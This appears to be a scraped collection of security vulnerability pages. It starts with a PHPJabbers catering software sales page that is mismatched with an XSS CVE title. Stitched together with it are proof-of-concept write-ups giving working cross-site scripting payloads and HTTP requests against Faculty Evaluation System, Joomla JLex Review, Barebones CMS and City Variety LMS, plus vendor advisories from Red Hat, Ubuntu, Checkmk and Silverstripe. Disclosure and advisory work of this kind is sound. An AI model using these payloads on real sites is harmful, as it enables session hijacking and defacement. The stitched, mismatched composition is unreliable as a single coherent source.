PHPJabbers Catering System v1.0 was discovered to contain a cross-site scripting (XSS) vulnerability via the component /index.php?controller=pjAdmin&action=pjActionForgot.

Enhance your restaurant website with a smart online catering reservation system!

Version: 1.0

Our PHP-based catering software will add a tasty, well-organized menu to your website and will enable your customers to pre-order exquisite meals and drinks online. You can offer them different kinds of packages for any occasion: breakfast, corporate cocktails, wedding, birthday party, etc. Our online catering management software lets you easily add as many products and categories as you wish, simplify order management, and process payments. Clients only have to make their choice, select their preferred payment method, and wait for their delivery!

**Catering System**

*   Highlights
*   Features
*   Demo
*   Faq
*   Pricing

**Product Highlights**

Our online catering reservation system is a great asset for all websites, cafes, restaurants, and other companies offering catering services. Once installed on a website, the catering software allows caterers to create and customize the menu, manage orders and payments, and improve workflows to successfully run their catering business online.

Customize Your Menu

Add unlimited menu items, both food and beverages, write short product descriptions, and upload images to each product. Set multiple sizes and the corresponding prices and assign products to different categories.

Online & Offline Payments

The catering reservation system supports various payment methods. Clients can pay online via PayPal and Authorize.net, or pay offline in cash, by bank transfer and credit card. You can also request other payment gateways.

Add Multiple Categories

Create various product categories for your restaurant menu: starters, platters, drinks, desserts, etc. Personalize each category by adding a title, a short description, and a representative image.

Email & SMS Notifications

Configure and automate different autoresponder messages that will be sent to administrators and clients upon new order, received payment, or order cancellation. Request an API key to enable SMS alerts.

Offer Different Packages

Compile products into catering packages designated for particular private and business events. Select product size and quantity, add price and specify how many people the package is suitable for.

Colorful & Responsive Design

The front-end layout of our online Catering System is mobile-friendly and fits all screen sizes. Admins can switch between 10 color schemes and choose the one that best matches your website branding.

Manage Orders

Check all online orders at a glance, and keep track of same-day bookings and deliveries. You can also add orders from the back-end of the catering booking system and edit reservations, if necessary.

PHP Source Code Customization

Get our Catering System with a Developer License and make your own modifications to the source code. We can also customize the PHP catering software for you upon request. Compare licenses  

SPECIAL OFFER

**Catering System for $4.29 Only**

Get all 65 PHPJabbers scripts in a bundle for just $299.

**Live Demo**

Preview both the front end and back end of the Catering System and test out the whole functionality.  
If you have any questions or need technical advice, go ahead and contact us.

**Catering System**

**Key Benefits**

Key Features

Script Modifications

Installation Support

Remote Hosting

Payment Gateways

**Pricing**

You can buy the online Catering System either with a Developer, or with a User Licence.  
Want to request a custom modification? Please, contact us and describe what needs to be changed!

Mega Sale deal

$4.29

per script

Free installation support

Modify the code

Copyright removal

Apply for Extended Licence and advertise our product on your website

Unlimited installations

Free updates

Get all minor updates for free

Custom modifications

Contact us and you'll receive quotation for the custom changes you may need

buy now

Free installation support

Modify the code

Copyright removal

Apply for Extended Licence and advertise our product on your website

Unlimited installations

Free updates

Get all minor updates for free

Custom modifications

Modify the software on your own or contact us and we will give you a quote

buy now

Mega Sale deal

$4.29 per script

Get 65 PHP Scripts

Modify the code

Copyright removal

Apply for Extended Licence and advertise our product on your website

Unlimited installations

Free updates

Get all minor updates for free

Custom modifications

Modify the software on your own or contact us and we will give you a quote

buy now

LIMITED OFFER

Get the Mega Sale bundle deal with all the PHP scripts you'll ever need for a total of

$299

VIEW DETAILS

**Testimonials**

Let our clients share their experience with our catering software and how the app has improved their online business.

“

Dear PHPJabbers Team, I really appreciate your support. Your restaurant menu and catering booking system are easy to set up and use. They are up to the value for what I have paid. Thanks, will soon buy other scripts.

M. Shehzad

“

I love the catering system by PHP Jabbers. It's easy to install and just as easy for my clients to manage. It integrates beautifully with any site design and their technical support is excellent.

Mikki Barker

“

Great PHP scripts at reasonable prices is only part of the story - when it comes with fantastic technical back-up service you have a winning formula! I would recommend PHPJabbers without hesitation - they have really helped me with all my questions and requests. Well done and thank you!

Richard Wildblood

**FAQ & Knowledge Base**

Pre-Sale FAQ

Read the most Frequently Asked Questions about this script, its features and use.

Support Service FAQ

Read more about our Support Service and how we can help you install Catering System.

Custom Mods FAQ

Do you need something changed? We offer customization services.

How to install a Script

See how easy it is to install the script. Just follow the instructions or leave it all to us.

FTP Clients

See how to upload our scripts using different FTP clients.

PHP Framework Used

We use our own in-house build framework which is really easy to understand and work with.

Our Services

We offer a wide range of web development       services.

License Types Explained

User and Developer licence available. We also have a special Extended Licence for webmasters.

Didn’t find exactly what you were looking for?

Contact Us

**Related Scripts**

**Restaurant Booking System**

$79 / $129

**Food Delivery Script**

$79 / $129

**Restaurant Menu Maker**

$39 / $69

**Night Club Booking Software**

$69 / $109

**Appointment Scheduler**

$69 / $129

**Service Booking Script**

$49 / $99

CVE-2023-34869: Catering System (Only $59) | PHPJabbers

Cross Site Scripting vulnerability in Faculty Evaulation System using PHP/MySQLi v.1.0 allows an attacker to execute arbitrary code via a crafted payload to the page parameter.

\# Faculty Evaluation System !\[\](https://hackmd.io/\_uploads/B1KnDvgw2.png) After pressing Set for each option !\[\](https://hackmd.io/\_uploads/r1WcdDgw3.png) stored xss Entering the payload in the bottom box of most projects will trigger -> I will write the details of the affected part at the end \[xss payload\](https://github.com/payloadbox/xss-payload-list/blob/master/Intruder/xss-payload-list.txt) \`\`\` <script>alert(1)</script> <img src=1 onerror=alert(1)> <iframe src=javascript:alert(1)> .... \`\`\` !\[\](https://hackmd.io/\_uploads/B1J2Dtlvn.png) !\[\](https://hackmd.io/\_uploads/SyKpwFevh.png) !\[\](https://hackmd.io/\_uploads/ByG2\_Pevn.png) !\[\](https://hackmd.io/\_uploads/Bys\_b\_lP2.png) !\[\](https://hackmd.io/\_uploads/H1ysROxP3.png) More interesting is this payload \`\`\` xss%20%22%3E%3E%3Cmarquee%3E%3Cimg%20src=x%20onerror=confirm(/OPENBUGBOUNTY/)%3E%3C/marquee%3E%22%20%3E%3C/plaintext\\%3E%3C/|\\%3E%3Cplaintext/onmouseover=prompt(/OPENBUGBOUNTY/)%20%3E%3Cscript%3Eprompt(/OPENBUGBOUNTY/)%3C/script%3E@gmail.com%3Cisindex%20formaction=javascript:alert(1)%20type=submit%3E%27--%3E%22%20%3E%3C/script%3E%3Cscript%3Ealert(1)%3C/script%3E%22%3E%3Cimg/id=%22confirm&lpar;%20OPENBUGBOUNTY)%22/alt=%22/%22src=%22/%22onerror=eval(id&%23x29;%3E%27%22%3E%3Cimg%20src=%22http:%20www.openbugbounty.org/images/design/openbugbounty-logo.png%22%3E%20%EF%BF%BC&show;=xss%20%22%3E%3E%3Cmarquee%3E%3Cimg%20src=x%20onerror=confirm(/OPENBUGBOUNTY/)%3E%3C/marquee%3E%22%20%3E%3C/plaintext\\%3E%3C/|\\%3E%3Cplaintext/onmouseover=prompt(/OPENBUGBOUNTY/)%20%3E%3Cscript%3Eprompt(/OPENBUGBOUNTY/)%3C/script%3E@gmail.com%3Cisindex%20formaction=javascript:alert(1)%20type=submit%3E%27--%3E%22%20%3E%3C/script%3E%3Cscript%3Ealert(1)%3C/s \`\`\` !\[\](https://hackmd.io/\_uploads/HyAyXOeP2.png) Stored xss will cause xss is triggered every time the page is visited Affected vulnerable blocks: \`\`\` On the page http://localhost/eval/, under "Manage Account," if an XSS payload is entered in the "First Name" and "Last Name" fields, it can trigger stored XSS. On the page http://localhost/eval/index.php?page=, after entering a reflected XSS payload in the "page=" parameter, it can trigger an attack. On the page http://localhost/eval/index.php?page=subject\_list, under the "Manage subject" setting in the "Action" section, if an XSS payload is entered in the "Description" and "Subject" fields, it can trigger stored XSS. On the page http://localhost/eval/index.php?page=class\_list, under the "Manage class" setting in the "Action" section, if an XSS payload is entered in any of the fields, it can trigger stored XSS. On the page http://localhost/eval/index.php?page=academic\_list, under the "Manage" setting in the "Action" section, if an XSS payload is entered in the "Year" field, it can trigger stored XSS. On the page http://localhost/eval/index.php?page=questionnaire, under the "Manage" setting in the "Action" section, in the "Question" field at the bottom of the page, if an XSS payload is entered, it can trigger stored XSS. On the page http://localhost/eval/index.php?page=criteria\_list, in the "Criteria" field, if an XSS payload is entered, it can trigger stored XSS. On any page under http://localhost/eval/index.php?page=faculty\_list, after clicking "Edit" in the "Action" column, on the page http://localhost/eval/index.php?page=edit\_faculty&id=, under the "Edit Faculty" section, if an XSS payload is entered in the "School ID," "First Name," and "Last Name" fields, it can trigger stored XSS. On any page under http://localhost/eval/index.php?page=student\_list, after clicking "Edit" in the "Action" column, on the respective page, in the "School ID," "First Name," and "Last Name" fields, if an XSS payload is entered, it can trigger stored XSS. On any page under http://localhost/eval/index.php?page=user\_list, after clicking "Edit" in the "Action" column, on the respective page, in the "First Name" and "Last Name" fields, if an XSS payload is entered, it can trigger stored XSS. \`\`\`

CVE-2023-36118: Faculty Evaluation System - HackMD

Joomla JLex Review extension version 6.0.1 suffers from a cross site scripting vulnerability.

    # Exploit Title: Joomla JLex Review 6.0.1 - Reflected XSS# Exploit Author: CraCkEr# Date: 01/08/2023# Vendor: JLexArt# Vendor Homepage: https://jlexart.com/# Software Link: https://extensions.joomla.org/extension/jlex-review/# Demo: https://jlexreview.jlexart.com/# Tested on: Windows 10 Pro# Impact: Manipulate the content of the site ## GreetingsThe_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka  CryptoJob (Twitter) twitter.com/0x0CryptoJob## DescriptionThe attacker can send to victim a link containing a malicious URL in an email or instant messagecan perform a wide variety of actions, such as stealing the victim's session token or login credentialsPath: /URL parameter is vulnerable to XSShttps://website/?review_id=5&itwed"onmouseover="confirm(1)"style="position:absolute%3bwidth:100%25%3bheight:100%25%3btop:0%3bleft:0%3b"b7yzn=1XSS Payloads:itwed"onmouseover="confirm(1)"style="position:absolute;width:100%;height:100%;top:0;left:0;"b7yzn[-] Done

Joomla JLex Review 6.0.1 Cross Site Scripting

The Barebones CMS v2.0.2 is vulnerable to Stored Cross-Site Scripting (XSS) when an authenticated user interacts with certain features on the admin panel.

    # Exploit Title: Barebones CMS v2.0.2 - Stored Cross-Site Scripting (XSS) (Authenticated)
    # Date: 2023-06-03
    # Exploit Author: tmrswrr
    # Vendor Homepage: https://barebonescms.com/
    # Software Link: https://github.com/cubiclesoft/barebones-cms/archive/master.zip
    # Version: v2.0.2
    # Tested : https://demo.barebonescms.com/
    
    
    --- Description ---
    
    1) Login admin panel and go to new story : 
    https://demo.barebonescms.com/sessions/127.0.0.1/moors-sluses/admin/?action=addeditasset&type=story&sec_t=241bac393bb576b2538613a18de8c01184323540
    2) Click edit button and  write your payload in the title field:
    Payload: "><script>alert(1)</script>
    3) After save change and will you see alert button
    
    
    POST /sessions/127.0.0.1/moors-sluses/admin/ HTTP/1.1
    Host: demo.barebonescms.com
    Cookie: PHPSESSID=81ecf7072ed639fa2fda1347883265a4
    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
    Accept: application/json, text/javascript, */*; q=0.01
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-Requested-With: XMLHttpRequest
    Content-Length: 237
    Origin: https://demo.barebonescms.com
    Dnt: 1
    Referer: https://demo.barebonescms.com/sessions/78.163.184.240/moors-sluses/admin/?action=addeditasset&id=1&type=story&lang=en-us&sec_t=241bac393bb576b2538613a18de8c01184323540
    Sec-Fetch-Dest: empty
    Sec-Fetch-Mode: cors
    Sec-Fetch-Site: same-origin
    Te: trailers
    Connection: close
    
    action=saveasset&id=1&revision=0&type=story&sec_t=a6adec1ffa60ca5adf4377df100719b952d3f596&lang=en-us&title=%22%3E%3Cscript%3Ealert(1)%3C%2Fscript%3E&newtag=&publish_date=2023-06-03&publish_time=12%3A07+am&unpublish_date=&unpublish_time=

CVE-2023-36211: OffSec’s Exploit Database Archive

Red Hat Security Advisory 2023-4409-01 - The mod_auth_openidc is an OpenID Connect authentication module for Apache HTTP Server. It enables an Apache HTTP Server to operate as an OpenID Connect Relying Party and/or OAuth 2.0 Resource Server.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: mod_auth_openidc:2.3 security update  
Advisory ID:       RHSA-2023:4409-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:4409  
Issue date:        2023-08-01  
CVE Names:         CVE-2023-37464   
=====================================================================

1. Summary:

An update for the mod_auth_openidc:2.3 module is now available for Red Hat  
Enterprise Linux 8.4 Advanced Mission Critical Update Support, Red Hat  
Enterprise Linux 8.4 Telecommunications Update Service, and Red Hat  
Enterprise Linux 8.4 Update Services for SAP Solutions.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream AUS (v.8.4) - x86_64  
Red Hat Enterprise Linux AppStream E4S (v.8.4) - aarch64, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux AppStream TUS (v.8.4) - aarch64, ppc64le, s390x, x86_64

3. Description:

The mod_auth_openidc is an OpenID Connect authentication module for Apache  
HTTP Server. It enables an Apache HTTP Server to operate as an OpenID  
Connect Relying Party and/or OAuth 2.0 Resource Server.

Security Fix(es):

* cjose: AES GCM decryption uses the Tag length from the actual  
Authentication Tag provided in the JWE (CVE-2023-37464)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2223295 - CVE-2023-37464 cjose: AES GCM decryption uses the Tag length from the actual Authentication Tag provided in the JWE

6. Package List:

Red Hat Enterprise Linux AppStream AUS (v.8.4):

Source:  
cjose-0.6.1-3.module+el8.4.0+19462+14bde120.src.rpm  
mod_auth_openidc-2.3.7-8.module+el8.4.0+9707+f2438af7.src.rpm

x86_64:  
cjose-0.6.1-3.module+el8.4.0+19462+14bde120.x86_64.rpm  
cjose-debuginfo-0.6.1-3.module+el8.4.0+19462+14bde120.x86_64.rpm  
cjose-debugsource-0.6.1-3.module+el8.4.0+19462+14bde120.x86_64.rpm  
cjose-devel-0.6.1-3.module+el8.4.0+19462+14bde120.x86_64.rpm  
mod_auth_openidc-2.3.7-8.module+el8.4.0+9707+f2438af7.x86_64.rpm  
mod_auth_openidc-debuginfo-2.3.7-8.module+el8.4.0+9707+f2438af7.x86_64.rpm  
mod_auth_openidc-debugsource-2.3.7-8.module+el8.4.0+9707+f2438af7.x86_64.rpm

Red Hat Enterprise Linux AppStream E4S (v.8.4):

Source:  
cjose-0.6.1-3.module+el8.4.0+19462+14bde120.src.rpm  
mod_auth_openidc-2.3.7-8.module+el8.4.0+9707+f2438af7.src.rpm

aarch64:  
cjose-0.6.1-3.module+el8.4.0+19462+14bde120.aarch64.rpm  
cjose-debuginfo-0.6.1-3.module+el8.4.0+19462+14bde120.aarch64.rpm  
cjose-debugsource-0.6.1-3.module+el8.4.0+19462+14bde120.aarch64.rpm  
cjose-devel-0.6.1-3.module+el8.4.0+19462+14bde120.aarch64.rpm  
mod_auth_openidc-2.3.7-8.module+el8.4.0+9707+f2438af7.aarch64.rpm  
mod_auth_openidc-debuginfo-2.3.7-8.module+el8.4.0+9707+f2438af7.aarch64.rpm  
mod_auth_openidc-debugsource-2.3.7-8.module+el8.4.0+9707+f2438af7.aarch64.rpm

ppc64le:  
cjose-0.6.1-3.module+el8.4.0+19462+14bde120.ppc64le.rpm  
cjose-debuginfo-0.6.1-3.module+el8.4.0+19462+14bde120.ppc64le.rpm  
cjose-debugsource-0.6.1-3.module+el8.4.0+19462+14bde120.ppc64le.rpm  
cjose-devel-0.6.1-3.module+el8.4.0+19462+14bde120.ppc64le.rpm  
mod_auth_openidc-2.3.7-8.module+el8.4.0+9707+f2438af7.ppc64le.rpm  
mod_auth_openidc-debuginfo-2.3.7-8.module+el8.4.0+9707+f2438af7.ppc64le.rpm  
mod_auth_openidc-debugsource-2.3.7-8.module+el8.4.0+9707+f2438af7.ppc64le.rpm

s390x:  
cjose-0.6.1-3.module+el8.4.0+19462+14bde120.s390x.rpm  
cjose-debuginfo-0.6.1-3.module+el8.4.0+19462+14bde120.s390x.rpm  
cjose-debugsource-0.6.1-3.module+el8.4.0+19462+14bde120.s390x.rpm  
cjose-devel-0.6.1-3.module+el8.4.0+19462+14bde120.s390x.rpm  
mod_auth_openidc-2.3.7-8.module+el8.4.0+9707+f2438af7.s390x.rpm  
mod_auth_openidc-debuginfo-2.3.7-8.module+el8.4.0+9707+f2438af7.s390x.rpm  
mod_auth_openidc-debugsource-2.3.7-8.module+el8.4.0+9707+f2438af7.s390x.rpm

x86_64:  
cjose-0.6.1-3.module+el8.4.0+19462+14bde120.x86_64.rpm  
cjose-debuginfo-0.6.1-3.module+el8.4.0+19462+14bde120.x86_64.rpm  
cjose-debugsource-0.6.1-3.module+el8.4.0+19462+14bde120.x86_64.rpm  
cjose-devel-0.6.1-3.module+el8.4.0+19462+14bde120.x86_64.rpm  
mod_auth_openidc-2.3.7-8.module+el8.4.0+9707+f2438af7.x86_64.rpm  
mod_auth_openidc-debuginfo-2.3.7-8.module+el8.4.0+9707+f2438af7.x86_64.rpm  
mod_auth_openidc-debugsource-2.3.7-8.module+el8.4.0+9707+f2438af7.x86_64.rpm

Red Hat Enterprise Linux AppStream TUS (v.8.4):

Source:  
cjose-0.6.1-3.module+el8.4.0+19462+14bde120.src.rpm  
mod_auth_openidc-2.3.7-8.module+el8.4.0+9707+f2438af7.src.rpm

aarch64:  
cjose-0.6.1-3.module+el8.4.0+19462+14bde120.aarch64.rpm  
cjose-debuginfo-0.6.1-3.module+el8.4.0+19462+14bde120.aarch64.rpm  
cjose-debugsource-0.6.1-3.module+el8.4.0+19462+14bde120.aarch64.rpm  
cjose-devel-0.6.1-3.module+el8.4.0+19462+14bde120.aarch64.rpm  
mod_auth_openidc-2.3.7-8.module+el8.4.0+9707+f2438af7.aarch64.rpm  
mod_auth_openidc-debuginfo-2.3.7-8.module+el8.4.0+9707+f2438af7.aarch64.rpm  
mod_auth_openidc-debugsource-2.3.7-8.module+el8.4.0+9707+f2438af7.aarch64.rpm

ppc64le:  
cjose-0.6.1-3.module+el8.4.0+19462+14bde120.ppc64le.rpm  
cjose-debuginfo-0.6.1-3.module+el8.4.0+19462+14bde120.ppc64le.rpm  
cjose-debugsource-0.6.1-3.module+el8.4.0+19462+14bde120.ppc64le.rpm  
cjose-devel-0.6.1-3.module+el8.4.0+19462+14bde120.ppc64le.rpm  
mod_auth_openidc-2.3.7-8.module+el8.4.0+9707+f2438af7.ppc64le.rpm  
mod_auth_openidc-debuginfo-2.3.7-8.module+el8.4.0+9707+f2438af7.ppc64le.rpm  
mod_auth_openidc-debugsource-2.3.7-8.module+el8.4.0+9707+f2438af7.ppc64le.rpm

s390x:  
cjose-0.6.1-3.module+el8.4.0+19462+14bde120.s390x.rpm  
cjose-debuginfo-0.6.1-3.module+el8.4.0+19462+14bde120.s390x.rpm  
cjose-debugsource-0.6.1-3.module+el8.4.0+19462+14bde120.s390x.rpm  
cjose-devel-0.6.1-3.module+el8.4.0+19462+14bde120.s390x.rpm  
mod_auth_openidc-2.3.7-8.module+el8.4.0+9707+f2438af7.s390x.rpm  
mod_auth_openidc-debuginfo-2.3.7-8.module+el8.4.0+9707+f2438af7.s390x.rpm  
mod_auth_openidc-debugsource-2.3.7-8.module+el8.4.0+9707+f2438af7.s390x.rpm

x86_64:  
cjose-0.6.1-3.module+el8.4.0+19462+14bde120.x86_64.rpm  
cjose-debuginfo-0.6.1-3.module+el8.4.0+19462+14bde120.x86_64.rpm  
cjose-debugsource-0.6.1-3.module+el8.4.0+19462+14bde120.x86_64.rpm  
cjose-devel-0.6.1-3.module+el8.4.0+19462+14bde120.x86_64.rpm  
mod_auth_openidc-2.3.7-8.module+el8.4.0+9707+f2438af7.x86_64.rpm  
mod_auth_openidc-debuginfo-2.3.7-8.module+el8.4.0+9707+f2438af7.x86_64.rpm  
mod_auth_openidc-debugsource-2.3.7-8.module+el8.4.0+9707+f2438af7.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-37464  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIcBAEBCAAGBQJkyRWaAAoJENzjgjWX9erEPFcP+gK3OVqND67C1FVjmRSd2wmw  
8Ddr3SmK5MDIIXbM2pfDN/lcwOoF6M1liIY09Xzz+w+eji7jO43TURcDCyxSscHk  
co9ovFMxi6ZiwDfvklnYbP4UBGw3qpUcz5l7vMqYauU2HI3/1Mk43+p0hgXYm+9u  
q3QgFhuBIYx/2ejOjT9rMgwjzGfk/ZRj933tAo5DkUsX5Rv581zRCJZJgxIC+SE7  
IA6E0Hwh0bsS4Lbxk553mKQJwCA6pJsjLPx3xM/5C0KOlO7bNFxQEuWAvIVhq9+P  
d8iJyzj6BqBsWNlyny0H9N+Ou3cVRr4Ff0nZdlxqpWV19AUFgRsOAg7U0dA91aRT  
vQ0qnY1RNIr9Y5sv+IggeKIS5LtimWZXOqUOhYvzKBGWPesGTU0H1aS1DUk886UN  
azpUl/ILezwnR2U6PDnAHNrjnAOHj7iVin+ifvwnGlPux5DUi/DRxJr+08t50ONr  
ltfqJLgGsQiDVYzsSha4LLtEHPLd3HAk7wV+9Se0NdOE8MwR7WU8Z64/Sp9b2zqL  
1pP2FFRLv0U+cx/r7I8kMNQLVUVqBmZif3vQRSH+zVuXJJoE12GeYB+pPbn4O3s3  
olieOC1m4WHpa9v2Np8pn9e1sNhfwtomOIqb/n/viVZRGzC6Itqg6odGpVSaKbuf  
/SK4aUxetVCed3bK/v/t  
=3+pF  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-4409-01

Ubuntu Security Notice 6264-1 - Several security issues were discovered in the WebKitGTK Web and JavaScript engines. If a user were tricked into viewing a malicious website, a remote attacker could exploit a variety of issues related to web browser security, including cross-site scripting attacks, denial of service attacks, and arbitrary code execution.

    ==========================================================================Ubuntu Security Notice USN-6264-1July 31, 2023webkit2gtk vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 23.04- Ubuntu 22.04 LTSSummary:Several security issues were fixed in WebKitGTK.Software Description:- webkit2gtk: Web content engine library for GTK+Details:Several security issues were discovered in the WebKitGTK Web and JavaScriptengines. If a user were tricked into viewing a malicious website, a remoteattacker could exploit a variety of issues related to web browser security,including cross-site scripting attacks, denial of service attacks, andarbitrary code execution.Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 23.04:   libjavascriptcoregtk-4.0-18     2.40.4-0ubuntu0.23.04.1   libjavascriptcoregtk-4.1-0      2.40.4-0ubuntu0.23.04.1   libjavascriptcoregtk-6.0-1      2.40.4-0ubuntu0.23.04.1   libwebkit2gtk-4.0-37            2.40.4-0ubuntu0.23.04.1   libwebkit2gtk-4.1-0             2.40.4-0ubuntu0.23.04.1   libwebkitgtk-6.0-4              2.40.4-0ubuntu0.23.04.1Ubuntu 22.04 LTS:   libjavascriptcoregtk-4.0-18     2.40.4-0ubuntu0.22.04.1   libjavascriptcoregtk-4.1-0      2.40.4-0ubuntu0.22.04.1   libjavascriptcoregtk-6.0-1      2.40.4-0ubuntu0.22.04.1   libwebkit2gtk-4.0-37            2.40.4-0ubuntu0.22.04.1   libwebkit2gtk-4.1-0             2.40.4-0ubuntu0.22.04.1   libwebkitgtk-6.0-4              2.40.4-0ubuntu0.22.04.1This update uses a new upstream release, which includes additional bugfixes. After a standard system update you need to restart any applicationsthat use WebKitGTK, such as Epiphany, to make all the necessary changes.References:   https://ubuntu.com/security/notices/USN-6264-1   CVE-2023-28204, CVE-2023-32373, CVE-2023-32393, CVE-2023-32435,   CVE-2023-32439, CVE-2023-37450Package Information:   https://launchpad.net/ubuntu/+source/webkit2gtk/2.40.4-0ubuntu0.23.04.1   https://launchpad.net/ubuntu/+source/webkit2gtk/2.40.4-0ubuntu0.22.04.1

Ubuntu Security Notice USN-6264-1

City Variety LMS version 2.2 suffers from a cross site scripting vulnerability.

**City Variety LMS 2.2 Cross Site Scripting**

Posted Aug 1, 2023

Authored by indoushka

City Variety LMS version 2.2 suffers from a cross site scripting vulnerability.

tags | exploit, xss

SHA-256 | 1cbbe0f2970a91c54fd6b773983a7f83c535dbf1c4e56f12913660cbe435877e

Download | Favorite | View

**City Variety LMS 2.2 Cross Site Scripting**

    ====================================================================================================================================| # Title     : cityvariety LMS 2.2 XSS Vulnerability                                                                              || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 69.0(32-bit)                                               | | # Vendor    : https://www.cityvariety.co.th/                                                                                     |  ====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : /news/download/?file=files/com_news/2023-05_df55c087b4d33c8.pdf'%22()%26%25<acx><ScRiPt%20>prompt(980997)</ScRiPt>&id=2481&name=[+] https://wwsesaogoth/news/download/?file=files/com_news/2023-05_df55c087b4d33c8.pdf%27%22()%26%25%3Cacx%3E%3CScRiPt%20%3Eprompt(980997)%3C/ScRiPt%3E&id=2481&name=Greetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (81,831)
*   Arbitrary (16,174)
*   BBS (2,859)
*   Bypass (1,738)
*   CGI (1,026)
*   Code Execution (7,261)
*   Conference (679)
*   Cracker (841)
*   CSRF (3,337)
*   DoS (23,388)
*   Encryption (2,369)
*   Exploit (51,723)
*   File Inclusion (4,219)
*   File Upload (970)
*   Firewall (821)
*   Info Disclosure (2,759)
*   Intrusion Detection (892)
*   Java (3,038)
*   JavaScript (855)
*   Kernel (6,661)
*   Local (14,445)
*   Magazine (586)
*   Overflow (12,668)
*   Perl (1,423)
*   PHP (5,141)
*   Proof of Concept (2,338)
*   Protocol (3,596)
*   Python (1,532)
*   Remote (30,710)
*   Root (3,578)
*   Rootkit (508)
*   Ruby (612)
*   Scanner (1,638)
*   Security Tool (7,882)
*   Shell (3,178)
*   Shellcode (1,213)
*   Sniffer (894)
*   Spoof (2,197)
*   SQL Injection (16,335)
*   TCP (2,402)
*   Trojan (687)
*   UDP (889)
*   Virus (664)
*   Vulnerability (31,731)
*   Web (9,634)
*   Whitepaper (3,748)
*   x86 (962)
*   XSS (17,892)
*   Other

**File Archives**

*   August 2023
*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (2,002)
*   BSD (373)
*   CentOS (57)
*   Cisco (1,922)
*   Debian (6,800)
*   Fedora (1,691)
*   FreeBSD (1,244)
*   Gentoo (4,322)
*   HPUX (879)
*   iOS (351)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (46,326)
*   Mac OS X (685)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (484)
*   RedHat (13,644)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,787)
*   UNIX (9,281)
*   UnixWare (186)
*   Windows (6,566)
*   Other

City Variety LMS 2.2 Cross Site Scripting

Reflected XSS in business intelligence in Checkmk <2.2.0p8, <2.1.0p32, <2.0.0p38, <=1.6.0p30.

Prior to this Werk it was possible to inject HTML or Javascript (Reflected XSS). A legitimate user tricked to click on a prepared link would then run arbitrary Javascript code in a valid session.

This vulnerability is only triggerable if another _Business Intelligence_ _BI pack_ (next to the default) was created.

We found this vulnerability internally.

**Affected Versions**:

*   2.2.0
*   2.1.0
*   2.0.0
*   1.6.0 (probably older versions as well)

**Indicators of Compromise**: To check for exploitation one can check the site apache access log var/log/apache/access\_log for entries like /$SITENAME/check\_mk/wato.py?mode=bi\_aggregations&bulk\_moveto=. The order of the URL paramters can be changed by an attacker. Potential injected code would be in the parameter bulk\_moveto.

**Vulnerability Management**: We have rated the issue with a CVSS Score of 5.4 (Medium) with the following CVSS vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N. We assigned CVE-2023-23548 to this vulnerability.

**Changes**: This Werk introduces escaping for the vulnerable parameter.

To the list of all Werks

CVE-2023-23548: Fix XSS in business intelligence

TinyMCE 4.x is vulnerable to several XSS vectors, which had been patched in later versions. Two of these have been identified as affecting `silverstripe/admin`.

Only Silverstripe CMS 4 is affected by this issue. It's not possible to upgrade Silverstripe CMS 4 to use a more recent release of TinyMCE without introducing breaking changes. Instead, the security patches that shipped in later releases of TinyMCE have been backported to the TinyMCE version bundled in `silverstripe/admin`.

Silverstripe CMS 5 is not affected by those vulnerabilities because it uses TinyMCE 6.

You can find more information about the underlying vulnerabilities in those GitHub security advisories:

- [GHSA-5h9g-x5rv-25wg Cross-site scripting vulnerability in TinyMCE](https://github.com/advisories/GHSA-5h9g-x5rv-25wg)
- [GHSA-w7jx-j77m-wp65 Cross-site scripting vulnerability in TinyMCE](https://github.com/advisories/GHSA-w7jx-j77m-wp65)

**Package**

composer silverstripe/admin (Composer)

**Affected versions**

< 1.13.6

**Patched versions**

1.13.6

**Description**

TinyMCE 4.x is vulnerable to several XSS vectors, which had been patched in later versions. Two of these have been identified as affecting silverstripe/admin.

